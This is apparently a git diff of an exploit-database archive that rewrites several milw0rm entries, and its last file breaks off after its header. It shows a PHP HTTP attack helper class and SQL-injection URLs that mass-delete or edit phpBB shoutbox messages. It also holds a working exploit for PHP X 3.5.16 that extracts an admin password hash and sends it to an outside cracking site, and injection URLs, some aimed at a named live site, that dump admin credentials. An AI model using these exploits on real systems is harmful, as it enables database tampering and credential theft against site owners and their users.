"\r\n"; + $packet .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; + $packet .= "Shell: $shell\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + $fp = fsockopen($this->host, $this->port, $errno, $errstr, 30); + + fputs($fp, $packet); + + $recv = ''; + + while(!feof($fp)) + $recv .= fgets($fp, 128); + + fclose($fp); + + # Remove headers + $data = explode("\r\n\r\n", $recv); + $headers = array_shift($data); + $content = implode("\r\n\r\n", $data); + + # Unchunk content + if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) + $content = $this->unchunk($content); + + # Find results + preg_match($this->expr, $content, $match); + + $match = $match[1]; + + # Add a \n if there is not + if(substr($match, -1) != "\n") + $match .= "\n"; + + return $match; + } + + /** + * unchunk() + * Remove chunked content's sizes which are put by the apache + * server when it uses chunked transfert-encoding. + */ + function unchunk($data) + { + $dsize = 1; + $offset = 0; + + while($dsize>0) + { + $hsize_size = strpos($data, "\r\n", $offset) - $offset; + + $dsize = hexdec(substr($data, $offset, $hsize_size)); + + # Remove $hsize\r\n from $data + $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); + + $offset += $dsize; + + # Remove the \r\n before the next $hsize + $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); + } + + return $data; + } +} + +/* + * + * Copyright (C) darkfig + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PhpSploit Class + * REQUIREMENTS: PHP 4 / PHP 5 + * VERSION: 2.0 + * LICENSE: GNU General Public License + * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt + * FILENAME: phpsploitclass.php + * + * CONTACT: gmdarkfig@gmail.com (french / english) + * GREETZ: Sparah, Ddx39 + * + * DESCRIPTION: + * The phpsploit is a class implementing a web user agent. + * You can add cookies, headers, use a proxy server with (or without) a + * basic authentification. It supports the GET and the POST method. It can + * also be used like a browser with the cookiejar() function (which allow + * a server to add several cookies for the next requests) and the + * allowredirection() function (which allow the script to follow all + * redirections sent by the server). It can return the content (or the + * headers) of the request. Others useful functions can be used for debugging. + * A manual is actually in development but to know how to use it, you can + * read the comments. 
+ * + * CHANGELOG: + * + * [2007-06-10] (2.0) + * * Code: Code optimization + * * New: Compatible with PHP 4 by default + * + * [2007-01-24] (1.2) + * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) + * * New: multipart/form-data enctype is now supported + * + * [2006-12-31] (1.1) + * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) + * * New: You can now call the getheader() / getcontent() function without parameters + * + * [2006-12-30] (1.0) + * * First version + * + */ + +class phpsploit +{ + var $proxyhost; + var $proxyport; + var $host; + var $path; + var $port; + var $method; + var $url; + var $packet; + var $proxyuser; + var $proxypass; + var $header; + var $cookie; + var $data; + var $boundary; + var $allowredirection; + var $last_redirection; + var $cookiejar; + var $recv; + var $cookie_str; + var $header_str; + var $server_content; + var $server_header; + + + /** + * This function is called by the + * get()/post()/formdata() functions. + * You don't have to call it, this is + * the main function. + * + * @access private + * @return string $this->recv ServerResponse + * + */ + function sock() + { + if(!empty($this->proxyhost) && !empty($this->proxyport)) + $socket = @fsockopen($this->proxyhost,$this->proxyport); + else + $socket = @fsockopen($this->host,$this->port); + + if(!$socket) + die("Error: Host seems down"); + + if($this->method=='get') + $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; + + elseif($this->method=='post' or $this->method=='formdata') + $this->packet = 'POST '.$this->url." 
HTTP/1.1\r\n"; + + else + die("Error: Invalid method"); + + if(!empty($this->proxyuser)) + $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; + + if(!empty($this->header)) + $this->packet .= $this->showheader(); + + if(!empty($this->cookie)) + $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; + + $this->packet .= 'Host: '.$this->host."\r\n"; + $this->packet .= "Connection: Close\r\n"; + + if($this->method=='post') + { + $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data."\r\n"; + } + elseif($this->method=='formdata') + { + $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data; + } + + $this->packet .= "\r\n"; + $this->recv = ''; + + fputs($socket,$this->packet); + + while(!feof($socket)) + $this->recv .= fgets($socket); + + fclose($socket); + + if($this->cookiejar) + $this->getcookie(); + + if($this->allowredirection) + return $this->getredirection(); + else + return $this->recv; + } + + + /** + * This function allows you to add several + * cookies in the request. + * + * @access public + * @param string cookn CookieName + * @param string cookv CookieValue + * @example $this->addcookie('name','value') + * + */ + function addcookie($cookn,$cookv) + { + if(!isset($this->cookie)) + $this->cookie = array(); + + $this->cookie[$cookn] = $cookv; + } + + + /** + * This function allows you to add several + * headers in the request. 
+ * + * @access public + * @param string headern HeaderName + * @param string headervalue Headervalue + * @example $this->addheader('Client-IP', '128.5.2.3') + * + */ + function addheader($headern,$headervalue) + { + if(!isset($this->header)) + $this->header = array(); + + $this->header[$headern] = $headervalue; + } + + + /** + * This function allows you to use an + * http proxy server. Several methods + * are supported. + * + * @access public + * @param string proxy ProxyHost + * @param integer proxyp ProxyPort + * @example $this->proxy('localhost',8118) + * @example $this->proxy('localhost:8118') + * + */ + function proxy($proxy,$proxyp='') + { + if(empty($proxyp)) + { + $proxarr = explode(':',$proxy); + $this->proxyhost = $proxarr[0]; + $this->proxyport = (int)$proxarr[1]; + } + else + { + $this->proxyhost = $proxy; + $this->proxyport = (int)$proxyp; + } + + if($this->proxyport > 65535) + die("Error: Invalid port number"); + } + + + /** + * This function allows you to use an + * http proxy server which requires a + * basic authentification. Several + * methods are supported: + * + * @access public + * @param string proxyauth ProxyUser + * @param string proxypass ProxyPass + * @example $this->proxyauth('user','pwd') + * @example $this->proxyauth('user:pwd'); + * + */ + function proxyauth($proxyauth,$proxypass='') + { + if(empty($proxypass)) + { + $posvirg = strpos($proxyauth,':'); + $this->proxyuser = substr($proxyauth,0,$posvirg); + $this->proxypass = substr($proxyauth,$posvirg+1); + } + else + { + $this->proxyuser = $proxyauth; + $this->proxypass = $proxypass; + } + } + + + /** + * This function allows you to set + * the 'User-Agent' header. + * + * @access public + * @param string useragent Agent + * @example $this->agent('Firefox') + * + */ + function agent($useragent) + { + $this->addheader('User-Agent',$useragent); + } + + + /** + * This function returns the headers + * which will be in the next request. 
+ * + * @access public + * @return string $this->header_str Headers + * @example $this->showheader() + * + */ + function showheader() + { + $this->header_str = ''; + + if(!isset($this->header)) + return; + + foreach($this->header as $name => $value) + $this->header_str .= $name.': '.$value."\r\n"; + + return $this->header_str; + } + + + /** + * This function returns the cookies + * which will be in the next request. + * + * @access public + * @return string $this->cookie_str Cookies + * @example $this->showcookie() + * + */ + function showcookie() + { + $this->cookie_str = ''; + + if(!isset($this->cookie)) + return; + + foreach($this->cookie as $name => $value) + $this->cookie_str .= $name.'='.$value.'; '; + + return $this->cookie_str; + } + + + /** + * This function returns the last + * formed http request. + * + * @access public + * @return string $this->packet HttpPacket + * @example $this->showlastrequest() + * + */ + function showlastrequest() + { + if(!isset($this->packet)) + return; + else + return $this->packet; + } + + + /** + * This function sends the formed + * http packet with the GET method. + * + * @access public + * @param string url Url + * @return string $this->sock() + * @example $this->url('localhost/index.php?var=x') + * @example $this->url('http://localhost:88/tst.php') + * + */ + function get($url) + { + $this->target($url); + $this->method = 'get'; + return $this->sock(); + } + + + /** + * This function sends the formed + * http packet with the POST method. + * + * @access public + * @param string url Url + * @param string data PostData + * @return string $this->sock() + * @example $this->post('http://localhost/','helo=x') + * + */ + function post($url,$data) + { + $this->target($url); + $this->method = 'post'; + $this->data = $data; + return $this->sock(); + } + + + /** + * This function sends the formed http + * packet with the POST method using + * the multipart/form-data enctype. 
+ * + * @access public + * @param array array FormDataArray + * @return string $this->sock() + * @example $formdata = array( + * frmdt_url => 'http://localhost/upload.php', + * frmdt_boundary => '123456', # Optional + * 'var' => 'example', + * 'file' => array( + * frmdt_type => 'image/gif', # Optional + * frmdt_transfert => 'binary' # Optional + * frmdt_filename => 'hello.php, + * frmdt_content => '')); + * $this->formdata($formdata); + * + */ + function formdata($array) + { + $this->target($array[frmdt_url]); + $this->method = 'formdata'; + $this->data = ''; + + if(!isset($array[frmdt_boundary])) + $this->boundary = 'phpsploit'; + else + $this->boundary = $array[frmdt_boundary]; + + foreach($array as $key => $value) + { + if(!preg_match('#^frmdt_(boundary|url)#',$key)) + { + $this->data .= str_repeat('-',29).$this->boundary."\r\n"; + $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; + + if(!is_array($value)) + { + $this->data .= "\r\n\r\n".$value."\r\n"; + } + else + { + $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; + + if(isset($array[$key][frmdt_type])) + $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; + + if(isset($array[$key][frmdt_transfert])) + $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; + + $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; + } + } + } + + $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; + return $this->sock(); + } + + + /** + * This function returns the content + * of the server response, without + * the headers. 
+ * + * @access public + * @param string code ServerResponse + * @return string $this->server_content + * @example $this->getcontent() + * @example $this->getcontent($this->url('http://localhost/')) + * + */ + function getcontent($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_content = ''; + + for($i=1;$iserver_content .= $code[$i]; + + return $this->server_content; + } + + + /** + * This function returns the headers + * of the server response, without + * the content. + * + * @access public + * @param string code ServerResponse + * @return string $this->server_header + * @example $this->getcontent() + * @example $this->getcontent($this->post('http://localhost/','1=2')) + * + */ + function getheader($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_header = $code[0]; + + return $this->server_header; + } + + + /** + * This function is called by the + * cookiejar() function. It adds the + * value of the "Set-Cookie" header + * in the "Cookie" header for the + * next request. You don't have to + * call it. + * + * @access private + * @param string code ServerResponse + * + */ + function getcookie() + { + foreach(explode("\r\n",$this->getheader()) as $header) + { + if(preg_match('/set-cookie/i',$header)) + { + $fequal = strpos($header,'='); + $fvirgu = strpos($header,';'); + + // 12=strlen('set-cookie: ') + $cname = substr($header,12,$fequal-12); + $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); + + $this->cookie[trim($cname)] = trim($cvalu); + } + } + } + + + /** + * This function is called by the + * get()/post() functions. You + * don't have to call it. 
+ * + * @access private + * @param string urltarg Url + * @example $this->target('http://localhost/') + * + */ + function target($urltarg) + { + if(!ereg('^http://',$urltarg)) + $urltarg = 'http://'.$urltarg; + + $urlarr = parse_url($urltarg); + $this->url = 'http://'.$urlarr['host'].$urlarr['path']; + + if(isset($urlarr['query'])) + $this->url .= '?'.$urlarr['query']; + + $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; + $this->host = $urlarr['host']; + + if($this->port != '80') + $this->host .= ':'.$this->port; + + if(!isset($urlarr['path']) or empty($urlarr['path'])) + die("Error: No path precised"); + + $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); + + if($this->port > 65535) + die("Error: Invalid port number"); + } + + + /** + * If you call this function, + * the script will extract all + * 'Set-Cookie' headers values + * and it will automatically add + * them into the 'Cookie' header + * for all next requests. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->cookiejar(0) + * @example $this->cookiejar(1) + * + */ + function cookiejar($code) + { + if($code=='0') + $this->cookiejar=FALSE; + + elseif($code=='1') + $this->cookiejar=TRUE; + } + + + /** + * If you call this function, + * the script will follow all + * redirections sent by the server. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->allowredirection(0) + * @example $this->allowredirection(1) + * + */ + function allowredirection($code) + { + if($code=='0') + $this->allowredirection=FALSE; + + elseif($code=='1') + $this->allowredirection=TRUE; + } + + + /** + * This function is called if + * allowredirection() is enabled. + * You don't have to call it. 
+ * + * @access private + * @return string $this->url('http://'.$this->host.$this->path.$this->last_redirection) + * @return string $this->url($this->last_redirection) + * @return string $this->recv; + * + */ + function getredirection() + { + if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) + { + $this->last_redirection = trim($codearr[2]); + + if(!ereg('://',$this->last_redirection)) + return $this->url('http://'.$this->host.$this->path.$this->last_redirection); + + else + return $this->url($this->last_redirection); + } + else + return $this->recv; + } + + + /** + * This function allows you + * to reset some parameters. + * + * @access public + * @param string func Param + * @example $this->reset('header') + * @example $this->reset('cookie') + * @example $this->reset() + * + */ + function reset($func='') + { + switch($func) + { + case 'header': + $this->header = array(); + break; + + case 'cookie': + $this->cookie = array(); + break; + + default: + $this->cookiejar = ''; + $this->header = array(); + $this->cookie = array(); + $this->allowredirection = ''; + break; + } + } +} + +?> + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6995.txt b/platforms/php/webapps/6995.txt index 4479a6bec..dfec5257e 100755 --- a/platforms/php/webapps/6995.txt +++ b/platforms/php/webapps/6995.txt 
@@ -1,39 +1,39 @@ -/* - -------------------------------------------------------------- - phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln - -------------------------------------------------------------- - Discovered By StAkeR[at]hotmail[dot]it - Download On http://www.phpbbhacks.com/load.php?id=1595 - NOTE: Works Regardless PHP.ini Settings! - Thanks darkjoker - -------------------------------------------------------------- - - File (shoutbox_view.php) - - - 50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id']; - - - - 168. if ( $mode == "delete" && $adel ) - 169. { - 170. $sql = "DELETE FROM " . SHOUTBOX_TABLE . " - 171. WHERE id = $id $del_mod"; - 172. if( !($result = $db->sql_query($sql)) ) - 173. { message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); } - 174. - - - - Delete All Messages - - shoutbox_view.php?mode=delete&id=-1 or 1=1/* - - - Edit Message / Post Message - - shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE] - - - - Blind SQL Injection - - phpBB2/shoutbox_view.php?mode=delete&id=[Query] - -*/ - -# milw0rm.com [2008-11-05] +/* + -------------------------------------------------------------- + phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln + -------------------------------------------------------------- + Discovered By StAkeR[at]hotmail[dot]it + Download On http://www.phpbbhacks.com/load.php?id=1595 + NOTE: Works Regardless PHP.ini Settings! + Thanks darkjoker + -------------------------------------------------------------- + + File (shoutbox_view.php) + + + 50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id']; + + + + 168. if ( $mode == "delete" && $adel ) + 169. { + 170. $sql = "DELETE FROM " . SHOUTBOX_TABLE . " + 171. WHERE id = $id $del_mod"; + 172. if( !($result = $db->sql_query($sql)) ) + 173. 
{ message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); } + 174. + + + - Delete All Messages + - shoutbox_view.php?mode=delete&id=-1 or 1=1/* + + - Edit Message / Post Message + - shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE] + + + - Blind SQL Injection + - phpBB2/shoutbox_view.php?mode=delete&id=[Query] + +*/ + +# milw0rm.com [2008-11-05] diff --git a/platforms/php/webapps/6996.php b/platforms/php/webapps/6996.php index d9fc57eb1..929854bf8 100755 --- a/platforms/php/webapps/6996.php +++ b/platforms/php/webapps/6996.php 
@@ -1,192 +1,192 @@ -action = $_GET['action']; - 12. $this->news_id = $_GET['news_id']; - 13. - 14. global $userinfo; - 15. global $core; - 16. - 17. $this->core = $core; - 18. - 19. $this->userinfo = $userinfo; - 20. - 21. - 22. - 23. - 24. if (!$this->userinfo){ DIE("HACK ATTEMPT"); } - 25. if ($this->userinfo[news] != 1){ DIE("NO ACCESS TO THIS MODULE"); } - 26. - 27. include("includes/text.inc.php"); - 28. $this->textFun = new textFunctions(); - 29. $this->newsCat = $this->core->db->dbCall("news_categories"); - 30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; } - 31. - 32. switch($this->action){ - 33. case "catrss": - 34. $this->catRSS(); - 35. break; - ... - - i've found other bugs..:D - - - news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/* - Result? HACKING ATTEMPT...but this fix is very stupid because isn't case sensitive... - news.php?action=view&news_id=1 ' UNION ALL SELECT 1,2,username,4,5,password,7,8 from users where user_id=1/* - - - -*/ - - -$search = new search; - - -if(preg_match('/http://(.+?)/i',$argv[1]) or !is_numeric($argv[2])) $search->argv(); - - -$uid = intval($argv[2]); -$host = explode('/',$argv[1]); -$search->magic(); - -$code = "\x31\x25\x32\x30\x25\x32\x37\x25\x32". - "\x30\x55\x4E\x49\x4F\x4E\x25\x32\x30". - "\x41\x4C\x4C\x25\x32\x30\x53\x45\x4C". - "\x45\x43\x54\x25\x32\x30\x31\x25\x32". - "\x43\x32\x25\x32\x43\x75\x73\x65\x72". - "\x6E\x61\x6D\x65\x25\x32\x43\x34\x25". - "\x32\x43\x35\x25\x32\x43\x70\x61\x73". - "\x73\x77\x6F\x72\x64\x25\x32\x43\x37". - "\x25\x32\x43\x38\x25\x32\x30\x66\x72". - "\x6F\x6D\x25\x32\x30\x75\x73\x65\x72". - "\x73\x25\x32\x30\x77\x68\x65\x72\x65". - "\x25\x32\x30\x75\x73\x65\x72\x5F\x69". 
- "\x64\x25\x33\x44".$uid."\x25\x32\x33"; - - - -$data .= "GET /$host[1]/news.php?action=view&news_id=$code HTTP/1.1\r\n"; -$data .= "Host: $host[0]\r\n"; -$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; -$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; -$data .= "Accept-Language: en-us,en;q=0.5\r\n"; -$data .= "Accept-Encoding: gzip,deflate\r\n"; -$data .= "Connection: close\r\n\r\n"; - - - -if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) die("socket_create() error!\r\n"); -if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) die("socket_set_option() error!\r\n"); -if(!socket_connect($socket,gethostbyname($host[0]),80)) die("socket_connect() error!\r\n"); -if(!socket_write($socket,$data,strlen($data))) die("socket_write() errror!\r\n"); - -while($html = socket_read($socket,1024,PHP_NORMAL_READ)) -{ - $content .= $html; -} socket_close($socket); - - - -if(preg_match('/

    ([0-9a-f]{32})/',$content,$result)) -{ - echo "[+] Exploit Successfully!\r\n"; - echo "[+] Hash: $result[1]\r\n"; - echo $search->md5($result[1]); - -} -else -{ - echo "[+] Exploit Failed!\r\n"; - echo "[+] Site Not Vulnerable / ID Not Valid!\r\n"; - exit; -} - -class search -{ - function md5($hash) - { - if(strlen($hash) != 32) die("hash not valid!\r\n"); - - $data .= "GET /?p&submit&s=md5&q=$hash&_= HTTP/1.1\r\n"; - $data .= "Host: md5.rednoize.com\r\n"; - $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; - $data .= "Connection: close\r\n\r\n"; - - if(!$socket = fsockopen('md5.rednoize.com',80)) die("fsockopen() error!\n"); - if(!fputs($socket,$data)) die("fputs() error!\n"); - - - while(!feof($socket)) - { - $content .= fgets($socket); - } fclose($socket); - - $result = explode(' ',$content); - - if(isset($result[19])) - { - return "[+] Password: ".substr($result[19],20,-6)."\r\n"; - } - } - - function argv() - { - echo "[+] PHP X 3.5.16 (news_id) Remote SQL Injection Exploit\r\n"; - echo "[+] Usage: php $argv[0] [host/path] [user_id]\r\n"; - echo "[+] Usage: php $argv[0] localhost/phpx 1\r\n"; - exit; - } - - function magic() - { - global $host; - - $data .= "GET /$host[1]/news.php?action=view&news_id=' HTTP/1.1\r\n"; - $data .= "Host: $host[0]\r\n"; - $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; - $data .= "Connection: close\r\n\r\n"; - - if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n"); - if(!fputs($socket,$data)) die("fputs() error!\n"); - - while(!feof($socket)) - { - $content .= fgets($socket); - } fclose($socket); - - if(!eregi('error in your SQL',$content)) - { - echo "[+] Magic Quotes On!\r\n[+] Exploit Failed!\r\n"; - exit; - } - } -} - -# milw0rm.com [2008-11-05] +action = $_GET['action']; + 12. $this->news_id = $_GET['news_id']; + 13. + 14. global $userinfo; + 15. global $core; + 16. + 17. $this->core = $core; + 18. + 19. $this->userinfo = $userinfo; + 20. + 21. + 22. + 23. + 24. 
if (!$this->userinfo){ DIE("HACK ATTEMPT"); } + 25. if ($this->userinfo[news] != 1){ DIE("NO ACCESS TO THIS MODULE"); } + 26. + 27. include("includes/text.inc.php"); + 28. $this->textFun = new textFunctions(); + 29. $this->newsCat = $this->core->db->dbCall("news_categories"); + 30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; } + 31. + 32. switch($this->action){ + 33. case "catrss": + 34. $this->catRSS(); + 35. break; + ... + + i've found other bugs..:D + + + news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/* + Result? HACKING ATTEMPT...but this fix is very stupid because isn't case sensitive... + news.php?action=view&news_id=1 ' UNION ALL SELECT 1,2,username,4,5,password,7,8 from users where user_id=1/* + + + +*/ + + +$search = new search; + + +if(preg_match('/http://(.+?)/i',$argv[1]) or !is_numeric($argv[2])) $search->argv(); + + +$uid = intval($argv[2]); +$host = explode('/',$argv[1]); +$search->magic(); + +$code = "\x31\x25\x32\x30\x25\x32\x37\x25\x32". + "\x30\x55\x4E\x49\x4F\x4E\x25\x32\x30". + "\x41\x4C\x4C\x25\x32\x30\x53\x45\x4C". + "\x45\x43\x54\x25\x32\x30\x31\x25\x32". + "\x43\x32\x25\x32\x43\x75\x73\x65\x72". + "\x6E\x61\x6D\x65\x25\x32\x43\x34\x25". + "\x32\x43\x35\x25\x32\x43\x70\x61\x73". + "\x73\x77\x6F\x72\x64\x25\x32\x43\x37". + "\x25\x32\x43\x38\x25\x32\x30\x66\x72". + "\x6F\x6D\x25\x32\x30\x75\x73\x65\x72". + "\x73\x25\x32\x30\x77\x68\x65\x72\x65". + "\x25\x32\x30\x75\x73\x65\x72\x5F\x69". 
+ "\x64\x25\x33\x44".$uid."\x25\x32\x33"; + + + +$data .= "GET /$host[1]/news.php?action=view&news_id=$code HTTP/1.1\r\n"; +$data .= "Host: $host[0]\r\n"; +$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; +$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; +$data .= "Accept-Language: en-us,en;q=0.5\r\n"; +$data .= "Accept-Encoding: gzip,deflate\r\n"; +$data .= "Connection: close\r\n\r\n"; + + + +if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) die("socket_create() error!\r\n"); +if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) die("socket_set_option() error!\r\n"); +if(!socket_connect($socket,gethostbyname($host[0]),80)) die("socket_connect() error!\r\n"); +if(!socket_write($socket,$data,strlen($data))) die("socket_write() errror!\r\n"); + +while($html = socket_read($socket,1024,PHP_NORMAL_READ)) +{ + $content .= $html; +} socket_close($socket); + + + +if(preg_match('/

    ([0-9a-f]{32})/',$content,$result)) +{ + echo "[+] Exploit Successfully!\r\n"; + echo "[+] Hash: $result[1]\r\n"; + echo $search->md5($result[1]); + +} +else +{ + echo "[+] Exploit Failed!\r\n"; + echo "[+] Site Not Vulnerable / ID Not Valid!\r\n"; + exit; +} + +class search +{ + function md5($hash) + { + if(strlen($hash) != 32) die("hash not valid!\r\n"); + + $data .= "GET /?p&submit&s=md5&q=$hash&_= HTTP/1.1\r\n"; + $data .= "Host: md5.rednoize.com\r\n"; + $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; + $data .= "Connection: close\r\n\r\n"; + + if(!$socket = fsockopen('md5.rednoize.com',80)) die("fsockopen() error!\n"); + if(!fputs($socket,$data)) die("fputs() error!\n"); + + + while(!feof($socket)) + { + $content .= fgets($socket); + } fclose($socket); + + $result = explode(' ',$content); + + if(isset($result[19])) + { + return "[+] Password: ".substr($result[19],20,-6)."\r\n"; + } + } + + function argv() + { + echo "[+] PHP X 3.5.16 (news_id) Remote SQL Injection Exploit\r\n"; + echo "[+] Usage: php $argv[0] [host/path] [user_id]\r\n"; + echo "[+] Usage: php $argv[0] localhost/phpx 1\r\n"; + exit; + } + + function magic() + { + global $host; + + $data .= "GET /$host[1]/news.php?action=view&news_id=' HTTP/1.1\r\n"; + $data .= "Host: $host[0]\r\n"; + $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; + $data .= "Connection: close\r\n\r\n"; + + if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n"); + if(!fputs($socket,$data)) die("fputs() error!\n"); + + while(!feof($socket)) + { + $content .= fgets($socket); + } fclose($socket); + + if(!eregi('error in your SQL',$content)) + { + echo "[+] Magic Quotes On!\r\n[+] Exploit Failed!\r\n"; + exit; + } + } +} + +# milw0rm.com [2008-11-05] diff --git a/platforms/php/webapps/6997.txt b/platforms/php/webapps/6997.txt index ea1cb68ad..14a1c61a2 100755 --- a/platforms/php/webapps/6997.txt +++ b/platforms/php/webapps/6997.txt 
@@ -1,43 +1,43 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script: PRE PODCAST PORTAL
-[~] Language : PHP
-[~] Website[main]: http://www.preproject.com
-[~] Website[script]: http://www.preproject.com/podcast.asp
-[~] Type : Commercial
-[~] Report-Date : 05/11/2008
-[~] Founder : G4N0K
-
-===============================================================================
-
-===[ XPL ]===
-
-[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
-[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
-
-
-===[ LIVE ]===
-[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
-[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800
-[~] Hussain-X
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script: PRE PODCAST PORTAL
+[~] Language : PHP
+[~] Website[main]: http://www.preproject.com
+[~] Website[script]: http://www.preproject.com/podcast.asp
+[~] Type : Commercial
+[~] Report-Date : 05/11/2008
+[~] Founder : G4N0K
+
+===============================================================================
+
+===[ XPL ]===
+
